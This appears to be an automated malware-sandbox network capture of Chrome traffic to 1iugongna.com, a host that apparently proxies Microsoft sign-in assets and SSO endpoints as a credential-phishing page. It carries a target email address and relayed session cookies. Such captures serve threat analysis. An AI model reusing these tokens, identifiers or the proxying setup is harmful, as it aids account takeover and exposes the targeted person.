                                                                              2025-01-10 20:42:05 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.54992320.190.160.204432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC694OUTGET /seamaritima.com/winauth/ssoprobe?client-request-id=3907e9e2-ff87-4c26-afac-3d35233ded99&_=1736541723747 HTTP/1.1
                                                                              Host: autologon.microsoftazuread-sso.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:42:06 UTC2097INHTTP/1.1 401 Unauthorized
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: image/png; charset=utf-8
                                                                              Expires: -1
                                                                              Vary: Origin
                                                                              X-Content-Type-Options: nosniff
                                                                              Access-Control-Allow-Origin: https://login.microsoftonline.com
                                                                              Access-Control-Allow-Credentials: true
                                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              x-ms-request-id: e4b06a09-b680-4d1d-93a6-155e87c03e00
                                                                              x-ms-ests-server: 2.1.19683.6 - FRC ProdSlices
                                                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
                                                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-aYoSqWawq5SE_jQOL5cWhw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                              X-XSS-Protection: 0
                                                                              WWW-Authenticate: Negotiate
                                                                              Set-Cookie: fpc=Amj3gWW2E8dLuF5oLqWDgSk; expires=Sun, 09-Feb-2025 20:42:05 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                              Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Connection: close
                                                                              Content-Length: 12
                                                                              2025-01-10 20:42:06 UTC12INData Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64
                                                                              Data Ascii: Unauthorized


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.549927207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:06 UTC1481OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:07 UTC780INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:06 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 1435
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                                              ETag: 0x8D79B8373CB2849
                                                                              x-ms-request-id: b5344b8f-401e-0055-56a0-63d3dd000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204206Z-1698bcdb8c7tj6cjhC1BL1w6s40000000bkg00000000mb6y
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:07 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              53192.168.2.549931207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:07 UTC2148OUTPOST /common/instrumentation/dssostatus HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 67
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              hpgrequestid: d7d0eec4-e7d3-4efa-b34c-bd2b6ee84600
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              client-request-id: 3907e9e2-ff87-4c26-afac-3d35233ded99
                                                                              canary: PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeoau1JdqNcijEDH2LGjZjWgr3Vds4MKzIKq2P0br_Ve4vT4c74cZhvUeliAZpuM1lJnJfUwfj_ryD15fI9Gyy9uJ4ahVsYWOPO-t1reIbphaf4o9U1DCg1078CxPrTJ7z3ob7RSoo_OArDvId3XbUJzntKyo7emInpqbWztt3HYmbOcL2gs4qNS_3W1-RJaxeZY3p8nrkMBoHLUZnSEqKliAA
                                                                              Content-type: application/json; charset=UTF-8
                                                                              hpgid: 1104
                                                                              Accept: application/json
                                                                              hpgact: 2101
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Origin: https://1iugongna.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:07 UTC67OUTData Raw: 7b 22 72 65 73 75 6c 74 43 6f 64 65 22 3a 32 2c 22 73 73 6f 44 65 6c 61 79 22 3a 30 2c 22 6c 6f 67 22 3a 22 50 72 6f 62 65 20 69 6d 61 67 65 20 65 72 72 6f 72 20 65 76 65 6e 74 20 66 69 72 65 64 22 7d
                                                                              Data Ascii: {"resultCode":2,"ssoDelay":0,"log":"Probe image error event fired"}
                                                                              2025-01-10 20:42:10 UTC2530INHTTP/1.1 200 OK
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/json; charset=utf-8
                                                                              Expires: -1
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Access-Control-Allow-Origin: https://autologon.microsoftazuread-sso.com/
                                                                              Access-Control-Allow-Credentials: true
                                                                              Access-Control-Allow-Methods: POST, OPTIONS
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              client-request-id: 3907e9e2-ff87-4c26-afac-3d35233ded99
                                                                              x-ms-request-id: fc4065cd-7e2e-42b4-a325-9b1483862a00
                                                                              x-ms-ests-server: 2.1.19683.6 - EUS ProdSlices
                                                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              x-ms-srs: 1.P
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-V7AK8-Zr9gXxz9nH2el_xQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                              Set-Cookie: fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; expires=Sun, 09-Feb-2025 20:42:10 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                              Date: Fri, 10 Jan 2025 20:42:10 GMT
                                                                              Connection: close
                                                                              content-length: 265
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:10 UTC265INData Raw: 7b 22 61 70 69 43 61 6e 61 72 79 22 3a 22 50 41 51 41 42 44 67 45 41 41 41 44 57 36 6a 6c 33 31 6d 42 33 54 37 75 67 72 57 54 54 38 70 46 65 45 77 4c 45 54 79 2d 58 36 34 52 5a 55 65 75 47 31 62 4d 59 52 4c 32 33 41 44 52 30 6a 54 6c 33 48 6a 31 2d 4e 5f 34 6c 34 76 72 37 53 6f 72 2d 64 38 75 34 65 4d 68 7a 49 6b 45 32 53 46 4a 46 6a 42 79 71 6e 33 41 4a 64 68 48 62 4a 67 58 79 7a 61 30 71 75 44 5a 79 78 67 30 5a 71 74 47 45 42 32 6f 69 74 49 7a 6c 65 71 48 63 7a 50 5f 75 54 43 4d 66 55 6d 76 75 30 44 31 4a 62 75 5f 45 76 7a 39 6d 76 4f 62 6e 54 65 55 51 4d 72 4a 37 7a 6c 6f 35 6f 5a 48 4e 59 65 64 42 53 43 34 57 73 39 72 62 59 73 54 59 6c 50 68 42 5a 58 6d 70 58 45 4b 4e 6f 6e 45 39 38 59 4b 4e 7a 4d 4d 7a 59 54 76 31 53 58 77 34 65 4d 72 46 77 66 57 67
                                                                              Data Ascii: {"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeEwLETy-X64RZUeuG1bMYRL23ADR0jTl3Hj1-N_4l4vr7Sor-d8u4eMhzIkE2SFJFjByqn3AJdhHbJgXyza0quDZyxg0ZqtGEB2oitIzleqHczP_uTCMfUmvu0D1Jbu_Evz9mvObnTeUQMrJ7zlo5oZHNYedBSC4Ws9rbYsTYlPhBZXmpXEKNonE98YKNzMMzYTv1SXw4eMrFwfWg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              54192.168.2.549934207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:07 UTC1467OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:07 UTC738INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:07 GMT
                                                                              Content-Type: image/x-icon
                                                                              Content-Length: 17174
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                              ETag: 0x8D8731230C851A6
                                                                              x-ms-request-id: c3b7b0a1-d01e-0078-31ff-6160ae000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204207Z-1698bcdb8c76jt4chC1BL1mhzg00000006eg00000000t7us
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:07 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                              Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                              2025-01-10 20:42:07 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                                              Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              55192.168.2.549935207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:07 UTC1480OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:07 UTC799INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:07 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 673
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT
                                                                              ETag: 0x8D7B0071D86E386
                                                                              x-ms-request-id: 3d521bf5-a01e-005d-7087-63c9d2000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204207Z-1698bcdb8c74kdr2hC1BL1mxc00000000bmg00000000x1fm
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
